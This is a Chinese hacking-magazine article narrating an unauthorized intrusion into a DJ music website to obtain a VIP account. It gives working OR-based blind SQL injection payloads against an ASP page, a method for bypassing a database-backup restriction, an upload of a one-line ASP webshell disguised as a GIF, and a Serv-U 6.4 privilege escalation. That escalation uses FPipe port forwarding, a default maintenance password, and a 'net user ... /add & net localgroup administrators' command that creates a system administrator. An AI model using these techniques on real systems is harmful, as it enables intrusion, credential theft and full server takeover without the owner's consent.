作者:Tommie(C.R.S.T)
已經發(fā)表在黑客手冊2008年第三期.
or突破防注入
    春節(jié)呆在家里上網，我表哥突然找我說要一個DJ網站的VIP會員，說搞定后請我吃KFC，于是就答應了。用IE打開目標網站，找到一個帶參數(shù)的ASP鏈接。提交AND 1=1，如圖2。
可能到了這里，有些讀者會選擇放棄。其實，如果一個網站的防注入不是過濾得很嚴的話，可以試試or注入。向注入點提交or 1=1，發(fā)現(xiàn)跳到另外一個頁面了，如圖3。

然后or 1=2返回最原始的頁面了，如圖4。

由于or的特性，當查詢條件為真的時候，返回是異常的，當查詢條件為假的時候，返回是正常的。用如下語句：

/productsview2.asp?id=248 or exists(select * from admin) //判斷是否存在admin這個表，發(fā)現(xiàn)頁面返回正常，也就是圖4，說明不存在admin這個表。
/productsview2.asp?id=248 or exists(select * from manage) //頁面返回異常了，也就是圖3，說明存在manage這個表。猜完表后就要猜解字段了。
/productsview2.asp?id=248 or exists(select username from manage) //返回異常頁面了，說明manage這個表中含有username這個字段，這時我們就可以猜數(shù)據了。
/productsview2.asp?id=248 or (select top 1 asc(mid(username,1,1)) form manage)<123 //判斷manage表中username字段的第一條數(shù)據的第一個字符的ascii值是否小于123，提交后發(fā)現(xiàn)返回異常頁面。
/productsview2.asp?id=248 or (select top 1 asc(mid(username,1,1)) form manage)>96 //提交后發(fā)現(xiàn)返回異常頁面，得到第一個字符的ascii值范圍在97-122之間，也就是在字母a-z之間，再慢慢縮小猜解的范圍直到猜解出來用牛族多功能ASCII轉換工具轉換一下就可以得到管理員用戶名的第一個字符了。需要猜解第二位的時候把上面語句改為mid(username,2,1)，第三位mid(username,3,1)……如此類推。經過一番努力，得到username字段的第一條數(shù)據的ASCII值為97 100 109 105 110，轉換得出字符串為admin。猜解完用戶名還需要猜解密碼，先猜字符再猜數(shù)據。
html備份限制的突破
    用明小子跑了下后臺，如圖5。

用注入得到的用戶密碼登陸后臺，逛了一圈之后發(fā)現(xiàn)有備份數(shù)據庫的地方，如圖6。

不過有HTML限制，這個可以突破的。“查看”-“源文件”-“文件”-“另存為”，保存到本地。接著用文本格式打開它，找到“<form method="post" action="admin_data.asp?action=backdata&act=backup">”，把這里的action改為admin_data.asp這個文件的URL路徑：“http://www.xxx.com/admin/admin_data.asp?action=backdata&;act=backup”，再修改“<input type="text" size="25" value="/data/#ylmv_data.mdb" disabled><input type=hidden name=DBpath value="/data/#ylmv_data.mdb">”的第二個value值“/data/#ylmv_data.mdb”改為你需要備份的文件?？赡苡行┳x者不明白為什么要這樣改，這里就要運用到一些HTML知識了，如果不會的朋友可以把凡是涉及“/data/#ylmv_data.mdb”這個路徑（也就是當前數(shù)據庫路徑）全部替換為你需要備份的文件。這種備份限制相信很多讀者都遇過，如果不知道突破的方法很可能又會放棄的了，所以在這里奉勸大家最好學學這方面的知識，跟著保存修改后的文件。但問題又來了，在后臺找不到可以上傳文件的功能，這時可以到前臺看看能不能找到可以上傳的地方，這里的DJ網站能讓我們注冊會員（普通會員），于是我就注冊了一個會員，在控制面版里找到可以上傳頭像的地方，于是上傳了一個只是把后綴改為gif格式的一句話asp木馬，上傳后如圖7。

原來是判斷文件頭，這時我們可以借助ASP圖片木馬生成器這款軟件，先把一張比較小的圖片（經過后來的測試發(fā)現(xiàn)除了判斷文件頭還判斷大?。┖鸵粋€asp一句話木馬放到這款軟件的目錄下，寫好名稱進行生成，如圖8。

就會在所在目錄生成一個“aspmuma.gif”圖片木馬，把它上傳上去，如圖9。

把返回的相對路徑按照上面的方法替換好，打開后如圖10，

寫好備份后的路徑進行備份，如圖11。

用lake2的eval最小馬發(fā)送端連接上去，如圖12。

Serv-U 6.4提權
    拿到WEBSHELL只要修改下數(shù)據庫就可以拿到VIP會員了，相信大家都會，以前的手冊也有介紹過。既然拿到SHELL，不提權怎對得起自己呢？先來看看這個虛擬主機是用什么FTP軟件搭建的。“開始”-“運行”-“FTP www.xxx.com”，如圖13。

最近，6.4這個版本有人發(fā)布了提權asp出來，于是我下載回來進行測試，發(fā)現(xiàn)無法成功提權，很多朋友都和我一樣覺得很郁悶。其實網上的ASP大多都是依賴XMLHTTP這個組件來訪問本地的43958端口添加系統(tǒng)權限FTP用戶，那么我們不用XMLHTTP來替我們添加FTP用戶而是我們自己創(chuàng)造條件來訪問43958端口又行不行呢？
    上傳一個被壓縮過的CMD.EXE（因為IIS6.0默認不讓上傳超過200KB的文件）和一個轉發(fā)工具：Fpipe.exe到“C:\Documents and Settings\All Users\Documents”這個目錄（這個目錄默認是everyone權限），并且已經在本地安裝好SERV-U。
在WEBSHELL執(zhí)行“"C:\Documents and Settings\All Users\Documents\FPipe.exe" -v -l 43959 -r 43958 127.0.0.1”，如圖14。

執(zhí)行之后IIS會處于假死現(xiàn)象，到了這時之后操作一定要迅速，不然被管理員發(fā)現(xiàn)網站訪問速度慢了許多就麻煩了。打開SERV-U，右鍵新建一個服務器，如圖15。

第一步輸入目標IP，第二步會提示要你輸入端口號，這時我們輸入轉發(fā)出來的端口43959，第三步輸入FTP服務器名稱，可以隨便輸入，第四步輸入默認維護帳號“LocalAdministrator”，第五步輸入默認密碼[email=“#l@$ak#.lk;0@P]“#l@$ak#.lk;0@P[/email]”，連接對方FTP服務器，如圖16，

發(fā)現(xiàn)已經得到對方FTP服務器的管理權限！新建一個FTP用戶，在“帳戶”-“特權”那里選為“系統(tǒng)管理員”，在“目錄訪問”那里把所有權限勾上，最后“應用”，如圖17，18。

    “開始”-“運行”-“FTP www.xxx.com”，輸入剛才新建FTP用戶和密碼，因為對方開了3389，所以連接上后執(zhí)行“quote site exec net user Tommie nohack /add & net localgroup administrators Tommie /add”，返回“200 EXEC command successful”說明成功添加了一個用戶是Tommie密碼為nohack的管理員，如圖19。

登陸3389，打開“任務管理器”-“進程”，勾選“顯示所有用戶的進程”，找到轉發(fā)工具的進程Fpipe.exe結束之，如圖20，

使IIS再次恢復正常工作。
感想
    這次入侵讓我回想起Gene6的提權，雖然虛擬主機的目錄權限早已設置得死死的，但興幸的是Documents這樣的目錄并沒有被設置，而且Serv-U默認只允許127.0.0.1（也就是本地，當然，你也可以把Serv-U設置成0.0.0.0這樣，也就是無限制連接）訪問43958端口，所以可以通過轉發(fā)來解決來這個問題。經過多個版本的測試，這個目錄無修改權限的提權方法是通殺所有版本的。前提服務器必須要支持WScript.Shell組件或支持執(zhí)行命令。最后文章有不清楚的朋友可以直接到黑客手冊論壇找我。論壇Id:Tommie。

最新評論